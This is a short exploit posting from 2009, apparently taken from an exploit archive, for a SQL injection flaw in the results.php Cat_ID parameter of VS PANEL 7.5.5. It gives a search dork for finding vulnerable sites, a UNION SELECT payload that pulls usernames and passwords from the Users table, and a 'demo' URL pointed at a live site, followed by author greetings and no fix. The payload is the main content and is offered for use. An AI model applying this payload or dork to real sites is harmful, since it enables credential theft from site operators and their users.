VS PANEL 7.5.5 (results.php Cat_ID) SQL Injection Vulnerability
2009-07-16 16:40:42####################################
# Homepage: http://www.vspanel.gr/ #
# Product: VS PANEL v.7.5.5 #
# DeScOvRed By:C0D3R-Dz #
# File: results.php #
# ContACt:[email protected] #
# Dork: "Powered by VS PANEL 7.5.5"#
###################################
################################### SQL Injection#####################################
# results.php?Cat_ID=-6+union+select+1,concat(username,0x3a,password),3,4+from+Users--#
#######################################################################################
################################### DeMo ############################################################
#www.vspanel.gr/results.php?Cat_ID=-6+union+select+1,concat(username,0x3a,password),3,4+from+Users--#
#####################################################################################################
#########################################
#Greetz to:His0K4-HouSsem_PHp-HacKdZ #
# IncluDeR #
#########################################
#
Fixes
No fixesIn order to submit a new fix you need to be registered.